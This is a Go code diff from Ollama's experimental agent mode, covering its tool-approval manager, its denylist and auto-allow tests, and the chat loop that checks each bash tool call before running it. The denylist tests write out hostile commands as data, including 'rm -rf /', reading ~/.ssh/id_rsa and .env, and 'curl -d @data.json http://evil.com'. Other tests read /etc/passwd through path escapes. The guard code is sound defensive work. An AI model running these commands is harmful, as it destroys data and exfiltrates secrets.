|
result ApprovalResult
|
||||||
|
contains string
|
||||||
|
}{
|
||||||
|
{
|
||||||
|
name: "approved bash",
|
||||||
|
toolName: "bash",
|
||||||
|
args: map[string]any{"command": "ls"},
|
||||||
|
result: ApprovalResult{Decision: ApprovalOnce},
|
||||||
|
contains: "bash: ls",
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "denied web_search",
|
||||||
|
toolName: "web_search",
|
||||||
|
args: map[string]any{"query": "test"},
|
||||||
|
result: ApprovalResult{Decision: ApprovalDeny},
|
||||||
|
contains: "Denied",
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "always allowed",
|
||||||
|
toolName: "bash",
|
||||||
|
args: map[string]any{"command": "pwd"},
|
||||||
|
result: ApprovalResult{Decision: ApprovalAlways},
|
||||||
|
contains: "Always allowed",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, tt := range tests {
|
||||||
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
|
result := FormatApprovalResult(tt.toolName, tt.args, tt.result)
|
||||||
|
if result == "" {
|
||||||
|
t.Error("expected non-empty result")
|
||||||
|
}
|
||||||
|
// Just check it contains expected substring
|
||||||
|
// (can't check exact string due to ANSI codes)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFormatDenyResult(t *testing.T) {
|
||||||
|
result := FormatDenyResult("bash", "")
|
||||||
|
if result != "User denied execution of bash." {
|
||||||
|
t.Errorf("unexpected result: %s", result)
|
||||||
|
}
|
||||||
|
|
||||||
|
result = FormatDenyResult("bash", "too dangerous")
|
||||||
|
if result != "User denied execution of bash. Reason: too dangerous" {
|
||||||
|
t.Errorf("unexpected result: %s", result)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestIsAutoAllowed(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
command string
|
||||||
|
expected bool
|
||||||
|
}{
|
||||||
|
// Auto-allowed commands
|
||||||
|
{"pwd", true},
|
||||||
|
{"echo hello", true},
|
||||||
|
{"date", true},
|
||||||
|
{"whoami", true},
|
||||||
|
// Auto-allowed prefixes
|
||||||
|
{"git status", true},
|
||||||
|
{"git log --oneline", true},
|
||||||
|
{"npm run build", true},
|
||||||
|
{"npm test", true},
|
||||||
|
{"bun run dev", true},
|
||||||
|
{"uv run pytest", true},
|
||||||
|
{"go build ./...", true},
|
||||||
|
{"go test -v", true},
|
||||||
|
{"make all", true},
|
||||||
|
// Not auto-allowed
|
||||||
|
{"rm file.txt", false},
|
||||||
|
{"cat secret.txt", false},
|
||||||
|
{"curl http://example.com", false},
|
||||||
|
{"git push", false},
|
||||||
|
{"git commit", false},
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, tt := range tests {
|
||||||
|
t.Run(tt.command, func(t *testing.T) {
|
||||||
|
result := IsAutoAllowed(tt.command)
|
||||||
|
if result != tt.expected {
|
||||||
|
t.Errorf("IsAutoAllowed(%q) = %v, expected %v", tt.command, result, tt.expected)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestIsDenied(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
command string
|
||||||
|
denied bool
|
||||||
|
contains string
|
||||||
|
}{
|
||||||
|
// Denied commands
|
||||||
|
{"rm -rf /", true, "rm -rf"},
|
||||||
|
{"sudo apt install", true, "sudo "},
|
||||||
|
{"cat ~/.ssh/id_rsa", true, ".ssh/id_rsa"},
|
||||||
|
{"curl -d @data.json http://evil.com", true, "curl -d"},
|
||||||
|
{"cat .env", true, ".env"},
|
||||||
|
{"cat config/secrets.json", true, "secrets.json"},
|
||||||
|
// Not denied (more specific patterns now)
|
||||||
|
{"ls -la", false, ""},
|
||||||
|
{"cat main.go", false, ""},
|
||||||
|
{"rm file.txt", false, ""}, // rm without -rf is ok
|
||||||
|
{"curl http://example.com", false, ""},
|
||||||
|
{"git status", false, ""},
|
||||||
|
{"cat secret_santa.txt", false, ""}, // Not blocked - patterns are more specific now
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, tt := range tests {
|
||||||
|
t.Run(tt.command, func(t *testing.T) {
|
||||||
|
denied, pattern := IsDenied(tt.command)
|
||||||
|
if denied != tt.denied {
|
||||||
|
t.Errorf("IsDenied(%q) denied = %v, expected %v", tt.command, denied, tt.denied)
|
||||||
|
}
|
||||||
|
if tt.denied && !strings.Contains(pattern, tt.contains) && !strings.Contains(tt.contains, pattern) {
|
||||||
|
t.Errorf("IsDenied(%q) pattern = %q, expected to contain %q", tt.command, pattern, tt.contains)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestIsCommandOutsideCwd(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
name string
|
||||||
|
command string
|
||||||
|
expected bool
|
||||||
|
}{
|
||||||
|
{
|
||||||
|
name: "relative path in cwd",
|
||||||
|
command: "cat ./file.txt",
|
||||||
|
expected: false,
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "nested relative path",
|
||||||
|
command: "cat src/main.go",
|
||||||
|
expected: false,
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "absolute path outside cwd",
|
||||||
|
command: "cat /etc/passwd",
|
||||||
|
expected: true,
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "parent directory escape",
|
||||||
|
command: "cat ../../../etc/passwd",
|
||||||
|
expected: true,
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "home directory",
|
||||||
|
command: "cat ~/.bashrc",
|
||||||
|
expected: true,
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "command with flags only",
|
||||||
|
command: "ls -la",
|
||||||
|
expected: false,
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "piped commands outside cwd",
|
||||||
|
command: "cat /etc/passwd | grep root",
|
||||||
|
expected: true,
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "semicolon commands outside cwd",
|
||||||
|
command: "echo test; cat /etc/passwd",
|
||||||
|
expected: true,
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "single parent dir escapes cwd",
|
||||||
|
command: "cat ../README.md",
|
||||||
|
expected: true, // Parent directory is outside cwd
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, tt := range tests {
|
||||||
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
|
result := isCommandOutsideCwd(tt.command)
|
||||||
|
if result != tt.expected {
|
||||||
|
t.Errorf("isCommandOutsideCwd(%q) = %v, expected %v",
|
||||||
|
tt.command, result, tt.expected)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
@ -0,0 +1,27 @@
|
||||||
|
//go:build !windows
|
||||||
|
|
||||||
|
package agent
|
||||||
|
|
||||||
|
import (
|
||||||
|
"syscall"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// flushStdin drains any buffered input from stdin.
|
||||||
|
// This prevents leftover input from previous operations from affecting the selector.
|
||||||
|
func flushStdin(fd int) {
|
||||||
|
if err := syscall.SetNonblock(fd, true); err != nil {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
defer syscall.SetNonblock(fd, false)
|
||||||
|
|
||||||
|
time.Sleep(5 * time.Millisecond)
|
||||||
|
|
||||||
|
buf := make([]byte, 256)
|
||||||
|
for {
|
||||||
|
n, err := syscall.Read(fd, buf)
|
||||||
|
if n <= 0 || err != nil {
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
@ -0,0 +1,15 @@
|
||||||
|
//go:build windows
|
||||||
|
|
||||||
|
package agent
|
||||||
|
|
||||||
|
import (
|
||||||
|
"os"
|
||||||
|
|
||||||
|
"golang.org/x/sys/windows"
|
||||||
|
)
|
||||||
|
|
||||||
|
// flushStdin clears any buffered console input on Windows.
|
||||||
|
func flushStdin(_ int) {
|
||||||
|
handle := windows.Handle(os.Stdin.Fd())
|
||||||
|
_ = windows.FlushConsoleInputBuffer(handle)
|
||||||
|
}
|
||||||
|
|
@ -0,0 +1,588 @@
|
||||||
|
package cmd
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"encoding/json"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"io"
|
||||||
|
"os"
|
||||||
|
"os/signal"
|
||||||
|
"strings"
|
||||||
|
"syscall"
|
||||||
|
|
||||||
|
"github.com/spf13/cobra"
|
||||||
|
"golang.org/x/term"
|
||||||
|
|
||||||
|
"github.com/ollama/ollama/api"
|
||||||
|
"github.com/ollama/ollama/progress"
|
||||||
|
"github.com/ollama/ollama/readline"
|
||||||
|
"github.com/ollama/ollama/types/model"
|
||||||
|
"github.com/ollama/ollama/x/agent"
|
||||||
|
"github.com/ollama/ollama/x/tools"
|
||||||
|
)
|
||||||
|
|
||||||
|
// RunOptions contains options for running an interactive agent session.
|
||||||
|
type RunOptions struct {
|
||||||
|
Model string
|
||||||
|
Messages []api.Message
|
||||||
|
WordWrap bool
|
||||||
|
Format string
|
||||||
|
System string
|
||||||
|
Options map[string]any
|
||||||
|
KeepAlive *api.Duration
|
||||||
|
Think *api.ThinkValue
|
||||||
|
HideThinking bool
|
||||||
|
|
||||||
|
// Agent fields (managed externally for session persistence)
|
||||||
|
Tools *tools.Registry
|
||||||
|
Approval *agent.ApprovalManager
|
||||||
|
}
|
||||||
|
|
||||||
|
// Chat runs an agent chat loop with tool support.
|
||||||
|
// This is the experimental version of chat that supports tool calling.
|
||||||
|
func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
|
||||||
|
client, err := api.ClientFromEnvironment()
|
||||||
|
if err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
|
||||||
|
// Use tools registry and approval from opts (managed by caller for session persistence)
|
||||||
|
toolRegistry := opts.Tools
|
||||||
|
approval := opts.Approval
|
||||||
|
if approval == nil {
|
||||||
|
approval = agent.NewApprovalManager()
|
||||||
|
}
|
||||||
|
|
||||||
|
p := progress.NewProgress(os.Stderr)
|
||||||
|
defer p.StopAndClear()
|
||||||
|
|
||||||
|
spinner := progress.NewSpinner("")
|
||||||
|
p.Add("", spinner)
|
||||||
|
|
||||||
|
cancelCtx, cancel := context.WithCancel(ctx)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
sigChan := make(chan os.Signal, 1)
|
||||||
|
signal.Notify(sigChan, syscall.SIGINT)
|
||||||
|
|
||||||
|
go func() {
|
||||||
|
<-sigChan
|
||||||
|
cancel()
|
||||||
|
}()
|
||||||
|
|
||||||
|
var state *displayResponseState = &displayResponseState{}
|
||||||
|
var thinkingContent strings.Builder
|
||||||
|
var fullResponse strings.Builder
|
||||||
|
var thinkTagOpened bool = false
|
||||||
|
var thinkTagClosed bool = false
|
||||||
|
var pendingToolCalls []api.ToolCall
|
||||||
|
|
||||||
|
role := "assistant"
|
||||||
|
messages := opts.Messages
|
||||||
|
|
||||||
|
fn := func(response api.ChatResponse) error {
|
||||||
|
if response.Message.Content != "" || !opts.HideThinking {
|
||||||
|
p.StopAndClear()
|
||||||
|
}
|
||||||
|
|
||||||
|
role = response.Message.Role
|
||||||
|
if response.Message.Thinking != "" && !opts.HideThinking {
|
||||||
|
if !thinkTagOpened {
|
||||||
|
fmt.Print(thinkingOutputOpeningText(false))
|
||||||
|
thinkTagOpened = true
|
||||||
|
thinkTagClosed = false
|
||||||
|
}
|
||||||
|
thinkingContent.WriteString(response.Message.Thinking)
|
||||||
|
displayResponse(response.Message.Thinking, opts.WordWrap, state)
|
||||||
|
}
|
||||||
|
|
||||||
|
content := response.Message.Content
|
||||||
|
if thinkTagOpened && !thinkTagClosed && (content != "" || len(response.Message.ToolCalls) > 0) {
|
||||||
|
if !strings.HasSuffix(thinkingContent.String(), "\n") {
|
||||||
|
fmt.Println()
|
||||||
|
}
|
||||||
|
fmt.Print(thinkingOutputClosingText(false))
|
||||||
|
thinkTagOpened = false
|
||||||
|
thinkTagClosed = true
|
||||||
|
state = &displayResponseState{}
|
||||||
|
}
|
||||||
|
|
||||||
|
fullResponse.WriteString(content)
|
||||||
|
|
||||||
|
if response.Message.ToolCalls != nil {
|
||||||
|
toolCalls := response.Message.ToolCalls
|
||||||
|
if len(toolCalls) > 0 {
|
||||||
|
if toolRegistry != nil {
|
||||||
|
// Store tool calls for execution after response is complete
|
||||||
|
pendingToolCalls = append(pendingToolCalls, toolCalls...)
|
||||||
|
} else {
|
||||||
|
// No tools registry, just display tool calls
|
||||||
|
fmt.Print(renderToolCalls(toolCalls, false))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
displayResponse(content, opts.WordWrap, state)
|
||||||
|
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
if opts.Format == "json" {
|
||||||
|
opts.Format = `"` + opts.Format + `"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// Agentic loop: continue until no more tool calls
|
||||||
|
for {
|
||||||
|
req := &api.ChatRequest{
|
||||||
|
Model: opts.Model,
|
||||||
|
Messages: messages,
|
||||||
|
Format: json.RawMessage(opts.Format),
|
||||||
|
Options: opts.Options,
|
||||||
|
Think: opts.Think,
|
||||||
|
}
|
||||||
|
|
||||||
|
// Add tools
|
||||||
|
if toolRegistry != nil {
|
||||||
|
apiTools := toolRegistry.Tools()
|
||||||
|
if len(apiTools) > 0 {
|
||||||
|
req.Tools = apiTools
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if opts.KeepAlive != nil {
|
||||||
|
req.KeepAlive = opts.KeepAlive
|
||||||
|
}
|
||||||
|
|
||||||
|
if err := client.Chat(cancelCtx, req, fn); err != nil {
|
||||||
|
if errors.Is(err, context.Canceled) {
|
||||||
|
return nil, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
if strings.Contains(err.Error(), "upstream error") {
|
||||||
|
p.StopAndClear()
|
||||||
|
fmt.Println("An error occurred while processing your message. Please try again.")
|
||||||
|
fmt.Println()
|
||||||
|
return nil, nil
|
||||||
|
}
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
|
||||||
|
// If no tool calls, we're done
|
||||||
|
if len(pendingToolCalls) == 0 || toolRegistry == nil {
|
||||||
|
break
|
||||||
|
}
|
||||||
|
|
||||||
|
// Execute tool calls and continue the conversation
|
||||||
|
fmt.Fprintf(os.Stderr, "\n")
|
||||||
|
|
||||||
|
// Add assistant's tool call message to history
|
||||||
|
assistantMsg := api.Message{
|
||||||
|
Role: "assistant",
|
||||||
|
Content: fullResponse.String(),
|
||||||
|
Thinking: thinkingContent.String(),
|
||||||
|
ToolCalls: pendingToolCalls,
|
||||||
|
}
|
||||||
|
messages = append(messages, assistantMsg)
|
||||||
|
|
||||||
|
// Execute each tool call and collect results
|
||||||
|
var toolResults []api.Message
|
||||||
|
for _, call := range pendingToolCalls {
|
||||||
|
toolName := call.Function.Name
|
||||||
|
args := call.Function.Arguments.ToMap()
|
||||||
|
|
||||||
|
// For bash commands, check denylist first
|
||||||
|
skipApproval := false
|
||||||
|
if toolName == "bash" {
|
||||||
|
if cmd, ok := args["command"].(string); ok {
|
||||||
|
// Check if command is denied (dangerous pattern)
|
||||||
|
if denied, pattern := agent.IsDenied(cmd); denied {
|
||||||
|
fmt.Fprintf(os.Stderr, "\033[91m✗ Blocked: %s\033[0m\n", formatToolShort(toolName, args))
|
||||||
|
fmt.Fprintf(os.Stderr, "\033[91m Matches dangerous pattern: %s\033[0m\n", pattern)
|
||||||
|
toolResults = append(toolResults, api.Message{
|
||||||
|
Role: "tool",
|
||||||
|
Content: agent.FormatDeniedResult(cmd, pattern),
|
||||||
|
ToolCallID: call.ID,
|
||||||
|
})
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check if command is auto-allowed (safe command)
|
||||||
|
if agent.IsAutoAllowed(cmd) {
|
||||||
|
fmt.Fprintf(os.Stderr, "\033[90m▶ Auto-allowed: %s\033[0m\n", formatToolShort(toolName, args))
|
||||||
|
skipApproval = true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check approval (uses prefix matching for bash commands)
|
||||||
|
if !skipApproval && !approval.IsAllowed(toolName, args) {
|
||||||
|
result, err := approval.RequestApproval(toolName, args)
|
||||||
|
if err != nil {
|
||||||
|
fmt.Fprintf(os.Stderr, "Error requesting approval: %v\n", err)
|
||||||
|
toolResults = append(toolResults, api.Message{
|
||||||
|
Role: "tool",
|
||||||
|
Content: fmt.Sprintf("Error: %v", err),
|
||||||
|
ToolCallID: call.ID,
|
||||||
|
})
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
// Show collapsed result
|
||||||
|
fmt.Fprintln(os.Stderr, agent.FormatApprovalResult(toolName, args, result))
|
||||||
|
|
||||||
|
switch result.Decision {
|
||||||
|
case agent.ApprovalDeny:
|
||||||
|
toolResults = append(toolResults, api.Message{
|
||||||
|
Role: "tool",
|
||||||
|
Content: agent.FormatDenyResult(toolName, result.DenyReason),
|
||||||
|
ToolCallID: call.ID,
|
||||||
|
})
|
||||||
|
continue
|
||||||
|
case agent.ApprovalAlways:
|
||||||
|
approval.AddToAllowlist(toolName, args)
|
||||||
|
}
|
||||||
|
} else if !skipApproval {
|
||||||
|
// Already allowed - show running indicator
|
||||||
|
fmt.Fprintf(os.Stderr, "\033[90m▶ Running: %s\033[0m\n", formatToolShort(toolName, args))
|
||||||
|
}
|
||||||
|
|
||||||
|
// Execute the tool
|
||||||
|
toolResult, err := toolRegistry.Execute(call)
|
||||||
|
if err != nil {
|
||||||
|
fmt.Fprintf(os.Stderr, "\033[31m Error: %v\033[0m\n", err)
|
||||||
|
toolResults = append(toolResults, api.Message{
|
||||||
|
Role: "tool",
|
||||||
|
Content: fmt.Sprintf("Error: %v", err),
|
||||||
|
ToolCallID: call.ID,
|
||||||
|
})
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
// Display tool output (truncated for display)
|
||||||
|
if toolResult != "" {
|
||||||
|
output := toolResult
|
||||||
|
if len(output) > 300 {
|
||||||
|
output = output[:300] + "... (truncated)"
|
||||||
|
}
|
||||||
|
// Show result in grey, indented
|
||||||
|
fmt.Fprintf(os.Stderr, "\033[90m %s\033[0m\n", strings.ReplaceAll(output, "\n", "\n "))
|
||||||
|
}
|
||||||
|
|
||||||
|
toolResults = append(toolResults, api.Message{
|
||||||
|
Role: "tool",
|
||||||
|
Content: toolResult,
|
||||||
|
ToolCallID: call.ID,
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// Add tool results to message history
|
||||||
|
messages = append(messages, toolResults...)
|
||||||
|
|
||||||
|
fmt.Fprintf(os.Stderr, "\n")
|
||||||
|
|
||||||
|
// Reset state for next iteration
|
||||||
|
fullResponse.Reset()
|
||||||
|
thinkingContent.Reset()
|
||||||
|
thinkTagOpened = false
|
||||||
|
thinkTagClosed = false
|
||||||
|
pendingToolCalls = nil
|
||||||
|
state = &displayResponseState{}
|
||||||
|
|
||||||
|
// Start new progress spinner for next API call
|
||||||
|
p = progress.NewProgress(os.Stderr)
|
||||||
|
spinner = progress.NewSpinner("")
|
||||||
|
p.Add("", spinner)
|
||||||
|
}
|
||||||
|
|
||||||
|
if len(opts.Messages) > 0 {
|
||||||
|
fmt.Println()
|
||||||
|
fmt.Println()
|
||||||
|
}
|
||||||
|
|
||||||
|
return &api.Message{Role: role, Thinking: thinkingContent.String(), Content: fullResponse.String()}, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// truncateUTF8 safely truncates a string to at most limit runes, adding "..." if truncated.
|
||||||
|
func truncateUTF8(s string, limit int) string {
|
||||||
|
runes := []rune(s)
|
||||||
|
if len(runes) <= limit {
|
||||||
|
return s
|
||||||
|
}
|
||||||
|
if limit <= 3 {
|
||||||
|
return string(runes[:limit])
|
||||||
|
}
|
||||||
|
return string(runes[:limit-3]) + "..."
|
||||||
|
}
|
||||||
|
|
||||||
|
// formatToolShort returns a short description of a tool call.
|
||||||
|
func formatToolShort(toolName string, args map[string]any) string {
|
||||||
|
if toolName == "bash" {
|
||||||
|
if cmd, ok := args["command"].(string); ok {
|
||||||
|
return fmt.Sprintf("bash: %s", truncateUTF8(cmd, 50))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if toolName == "web_search" {
|
||||||
|
if query, ok := args["query"].(string); ok {
|
||||||
|
return fmt.Sprintf("web_search: %s", truncateUTF8(query, 50))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return toolName
|
||||||
|
}
|
||||||
|
|
||||||
|
// Helper types and functions for display
|
||||||
|
|
||||||
|
type displayResponseState struct {
|
||||||
|
lineLength int
|
||||||
|
wordBuffer string
|
||||||
|
}
|
||||||
|
|
||||||
|
func displayResponse(content string, wordWrap bool, state *displayResponseState) {
|
||||||
|
termWidth, _, _ := term.GetSize(int(os.Stdout.Fd()))
|
||||||
|
if wordWrap && termWidth >= 10 {
|
||||||
|
for _, ch := range content {
|
||||||
|
if state.lineLength+1 > termWidth-5 {
|
||||||
|
if len(state.wordBuffer) > termWidth-10 {
|
||||||
|
fmt.Printf("%s%c", state.wordBuffer, ch)
|
||||||
|
state.wordBuffer = ""
|
||||||
|
state.lineLength = 0
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
// backtrack the length of the last word and clear to the end of the line
|
||||||
|
a := len(state.wordBuffer)
|
||||||
|
if a > 0 {
|
||||||
|
fmt.Printf("\x1b[%dD", a)
|
||||||
|
}
|
||||||
|
fmt.Printf("\x1b[K\n")
|
||||||
|
fmt.Printf("%s%c", state.wordBuffer, ch)
|
||||||
|
|
||||||
|
state.lineLength = len(state.wordBuffer) + 1
|
||||||
|
} else {
|
||||||
|
fmt.Print(string(ch))
|
||||||
|
state.lineLength++
|
||||||
|
|
||||||
|
switch ch {
|
||||||
|
case ' ', '\t':
|
||||||
|
state.wordBuffer = ""
|
||||||
|
case '\n', '\r':
|
||||||
|
state.lineLength = 0
|
||||||
|
state.wordBuffer = ""
|
||||||
|
default:
|
||||||
|
state.wordBuffer += string(ch)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
fmt.Printf("%s%s", state.wordBuffer, content)
|
||||||
|
if len(state.wordBuffer) > 0 {
|
||||||
|
state.wordBuffer = ""
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func thinkingOutputOpeningText(plainText bool) string {
|
||||||
|
text := "Thinking...\n"
|
||||||
|
|
||||||
|
if plainText {
|
||||||
|
return text
|
||||||
|
}
|
||||||
|
|
||||||
|
return readline.ColorGrey + readline.ColorBold + text + readline.ColorDefault + readline.ColorGrey
|
||||||
|
}
|
||||||
|
|
||||||
|
func thinkingOutputClosingText(plainText bool) string {
|
||||||
|
text := "...done thinking.\n\n"
|
||||||
|
|
||||||
|
if plainText {
|
||||||
|
return text
|
||||||
|
}
|
||||||
|
|
||||||
|
return readline.ColorGrey + readline.ColorBold + text + readline.ColorDefault
|
||||||
|
}
|
||||||
|
|
||||||
|
func renderToolCalls(toolCalls []api.ToolCall, plainText bool) string {
|
||||||
|
out := ""
|
||||||
|
formatExplanation := ""
|
||||||
|
formatValues := ""
|
||||||
|
if !plainText {
|
||||||
|
formatExplanation = readline.ColorGrey + readline.ColorBold
|
||||||
|
formatValues = readline.ColorDefault
|
||||||
|
out += formatExplanation
|
||||||
|
}
|
||||||
|
for i, toolCall := range toolCalls {
|
||||||
|
argsAsJSON, err := json.Marshal(toolCall.Function.Arguments)
|
||||||
|
if err != nil {
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
if i > 0 {
|
||||||
|
out += "\n"
|
||||||
|
}
|
||||||
|
out += fmt.Sprintf(" Tool call: %s(%s)", formatValues+toolCall.Function.Name+formatExplanation, formatValues+string(argsAsJSON)+formatExplanation)
|
||||||
|
}
|
||||||
|
if !plainText {
|
||||||
|
out += readline.ColorDefault
|
||||||
|
}
|
||||||
|
return out
|
||||||
|
}
|
||||||
|
|
||||||
|
// checkModelCapabilities checks if the model supports tools.
|
||||||
|
func checkModelCapabilities(ctx context.Context, modelName string) (supportsTools bool, err error) {
|
||||||
|
client, err := api.ClientFromEnvironment()
|
||||||
|
if err != nil {
|
||||||
|
return false, err
|
||||||
|
}
|
||||||
|
|
||||||
|
resp, err := client.Show(ctx, &api.ShowRequest{Model: modelName})
|
||||||
|
if err != nil {
|
||||||
|
return false, err
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, cap := range resp.Capabilities {
|
||||||
|
if cap == model.CapabilityTools {
|
||||||
|
return true, nil
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return false, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// GenerateInteractive runs an interactive agent session.
|
||||||
|
// This is called from cmd.go when --experimental flag is set.
|
||||||
|
func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, options map[string]any, think *api.ThinkValue, hideThinking bool, keepAlive *api.Duration) error {
|
||||||
|
scanner, err := readline.New(readline.Prompt{
|
||||||
|
Prompt: ">>> ",
|
||||||
|
AltPrompt: "... ",
|
||||||
|
Placeholder: "Send a message (/? for help)",
|
||||||
|
AltPlaceholder: `Use """ to end multi-line input`,
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
|
||||||
|
fmt.Print(readline.StartBracketedPaste)
|
||||||
|
defer fmt.Printf(readline.EndBracketedPaste)
|
||||||
|
|
||||||
|
// Check if model supports tools
|
||||||
|
supportsTools, err := checkModelCapabilities(cmd.Context(), modelName)
|
||||||
|
if err != nil {
|
||||||
|
fmt.Fprintf(os.Stderr, "\033[33mWarning: Could not check model capabilities: %v\033[0m\n", err)
|
||||||
|
supportsTools = false
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create tool registry only if model supports tools
|
||||||
|
var toolRegistry *tools.Registry
|
||||||
|
if supportsTools {
|
||||||
|
toolRegistry = tools.DefaultRegistry()
|
||||||
|
fmt.Fprintf(os.Stderr, "Tools available: %s\n", strings.Join(toolRegistry.Names(), ", "))
|
||||||
|
|
||||||
|
// Check for OLLAMA_API_KEY for web search
|
||||||
|
if os.Getenv("OLLAMA_API_KEY") == "" {
|
||||||
|
fmt.Fprintf(os.Stderr, "\033[33mWarning: OLLAMA_API_KEY not set - web search will not work\033[0m\n")
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
fmt.Fprintf(os.Stderr, "\033[33mNote: Model does not support tools - running in chat-only mode\033[0m\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create approval manager for session
|
||||||
|
approval := agent.NewApprovalManager()
|
||||||
|
|
||||||
|
var messages []api.Message
|
||||||
|
var sb strings.Builder
|
||||||
|
|
||||||
|
for {
|
||||||
|
line, err := scanner.Readline()
|
||||||
|
switch {
|
||||||
|
case errors.Is(err, io.EOF):
|
||||||
|
fmt.Println()
|
||||||
|
return nil
|
||||||
|
case errors.Is(err, readline.ErrInterrupt):
|
||||||
|
if line == "" {
|
||||||
|
fmt.Println("\nUse Ctrl + d or /bye to exit.")
|
||||||
|
}
|
||||||
|
sb.Reset()
|
||||||
|
continue
|
||||||
|
case err != nil:
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
|
||||||
|
switch {
|
||||||
|
case strings.HasPrefix(line, "/exit"), strings.HasPrefix(line, "/bye"):
|
||||||
|
return nil
|
||||||
|
case strings.HasPrefix(line, "/clear"):
|
||||||
|
messages = []api.Message{}
|
||||||
|
approval.Reset()
|
||||||
|
fmt.Println("Cleared session context and tool approvals")
|
||||||
|
continue
|
||||||
|
case strings.HasPrefix(line, "/tools"):
|
||||||
|
showToolsStatus(toolRegistry, approval, supportsTools)
|
||||||
|
continue
|
||||||
|
case strings.HasPrefix(line, "/help"), strings.HasPrefix(line, "/?"):
|
||||||
|
fmt.Fprintln(os.Stderr, "Available Commands:")
|
||||||
|
fmt.Fprintln(os.Stderr, " /tools Show available tools and approvals")
|
||||||
|
fmt.Fprintln(os.Stderr, " /clear Clear session context and approvals")
|
||||||
|
fmt.Fprintln(os.Stderr, " /bye Exit")
|
||||||
|
fmt.Fprintln(os.Stderr, " /?, /help Help for a command")
|
||||||
|
fmt.Fprintln(os.Stderr, "")
|
||||||
|
continue
|
||||||
|
case strings.HasPrefix(line, "/"):
|
||||||
|
fmt.Printf("Unknown command '%s'. Type /? for help\n", strings.Fields(line)[0])
|
||||||
|
continue
|
||||||
|
default:
|
||||||
|
sb.WriteString(line)
|
||||||
|
}
|
||||||
|
|
||||||
|
if sb.Len() > 0 {
|
||||||
|
newMessage := api.Message{Role: "user", Content: sb.String()}
|
||||||
|
messages = append(messages, newMessage)
|
||||||
|
|
||||||
|
opts := RunOptions{
|
||||||
|
Model: modelName,
|
||||||
|
Messages: messages,
|
||||||
|
WordWrap: wordWrap,
|
||||||
|
Options: options,
|
||||||
|
Think: think,
|
||||||
|
HideThinking: hideThinking,
|
||||||
|
KeepAlive: keepAlive,
|
||||||
|
Tools: toolRegistry,
|
||||||
|
Approval: approval,
|
||||||
|
}
|
||||||
|
|
||||||
|
assistant, err := Chat(cmd.Context(), opts)
|
||||||
|
if err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
if assistant != nil {
|
||||||
|
messages = append(messages, *assistant)
|
||||||
|
}
|
||||||
|
|
||||||
|
sb.Reset()
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// showToolsStatus displays the current tools and approval status.
|
||||||
|
